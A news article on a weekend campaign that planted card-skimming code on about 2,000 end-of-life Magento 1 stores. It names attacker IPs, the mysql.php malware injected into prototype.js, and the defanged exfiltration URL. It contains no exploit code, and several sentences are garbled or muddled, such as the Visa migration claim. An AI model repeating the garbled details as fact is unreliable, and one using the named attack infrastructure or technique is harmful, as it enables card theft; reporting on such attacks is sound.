Over the weekend, 2, 000 plus Magento Stores across the world have been hacked in a largest documented campaign to date. These attacks remind of “megacart styled”, where attackers compromise an online shopping cart, generally, with only a few lines of code, that is used to swipe users’ card detailed entered by them. These details are then sent to command and control server belongs to the crooks that can sell them on dark web or used in purchase items through fraudulent means.
Sansec, a security firm specializes in megacart attacks, confirmed on over 2000 Magento attacks over the weekend. It released a report detailing about the incident, according to which, the attack targeted stores using the no longer supported Magento version 1, which was announced by Adobe, the owners and distributors of the platform, last year June. The report also states total 1904 stores were infected with a unique keylogger which was stealing card data using checkout pages used by online stores.
Most of the stores that were compromised have no history of prior security incidents. So, the attackers might use an entirely new attack method to gain access to the servers used by the stores. This new method not only granted them access to the data but also write new code to their checkout pages. It is likely that some unknown exploit was used and is likely to be bought from an underground hacker forum.
Sansec notes, “While we are still investigating the exact vector, this campaign may be related to a recent Magento 1 0day (exploit) that was put up for sale a few weeks ago. User z3r0day announced on a hacking forum to sell a Magento 1 “remote code execution” exploit method, including instruction video, for $5000. Allegedly, no prior Magento admin account is required. Seller z3r0day stressed that – because Magento 1 is End-Of-Life – no official patches will be provided by Adobe to fix this bug, which renders this exploit extra damaging to store owners using the legacy platform. To sweeten the deal, z3r0day pledged to only sell 10 copies of the dangerous exploit.”
The attacker used IPs 220.127.116.11 (US) and 18.104.22.168 (OVH, FR) that allows their interaction with the Magento admin and Magento Connect feature allowed them to download and install various files, including malware mysql.php. This malicious file would be deleted automatically once it was added to the prototype.js file used by Magento.
Researchers noted number of attempts was made to install files over the weekend, possibly to install the improved one skimmer. This skimmer could also be installed to the prototype.js file and was executed when the checkout page is referenced. The attack was used for stealing credit card info as well as redirecting payment later on. The researchers managed to trace where the payment are being ex-filtrated to. They discovered, it to the same Moscow-hosted site at hxxps://imags.pw/502.jsp where the keylogger is being stored.
Officially, Magento 1 was labeled as end-of-life from 2020. So, no updates were received the Adobe to all the end-of-life products. Those customers were however notified about the case and that they were to migrate to version 2. At that time, estimated over 270,000 stores were running version 1. At the end of 2019, this number was found in between 200,000 and 240,000. This figure was approx 110,000 at the end of June when Adobe officially announced End-of-Life. The company, meanwhile, pushed the date twice because of seeing this slow migration to version 2. Of those hundred thousands of stores that were vulnerable to the attack experience low traffic volumes. This means, they would not be worth a hacker’s time.
As it all upon end-user or customer to prevent the megacart attackers, here was the first preventative advice given at the time when the first observed arrest associated with magecard attacks were made in Indonesia, in 2020:
“To avoid big financial losses due to JS-sniffers [magecart style attacks], it’s recommended for online users to have a separate pre-paid card for online payments, set spending limits on cards, used for online shopping, or even use a separate bank account exclusively for online purchases. Online merchants, in their turn, need to keep their software updated and carry out regular cybersecurity assessments of their websites.”
MasterCard and Visa issued alerts due to given slow shift to version 2. Visa warned that if online shop owners did not migrate to version 1, they could be found to be PCI DSS non-compliant, which governs how card data is handled by merchants and financial institutions. It is case very devastating as they could become directly liable for the damages they cause to their customers.
While, the ramifications of the Mastercard’s alert were not saying that 77% of the total web skimming incidents was of those companies that were not in compliance with PCI DSS requirement 6 – the rule in which it is required for store owners to run up-to-date systems. Non-compliance with the standard has several other negatives for online store owners including monthly penalties which can range from 5, 000 USD to 100, 000 USD from different category of business. Also, if an incident regarding any breach and deemed non-compliant, the following penalties can be melted out to them:
· 50 USD to 90 USD Fines per cardholder whose information was endangered,
· Company and the payment processor relationship termination,
· Customers can level civil suites at the businesses
So, if you are still using the version 1, it is the time you should move on to Magento version 2, as the unknown exploit being used will not be patched.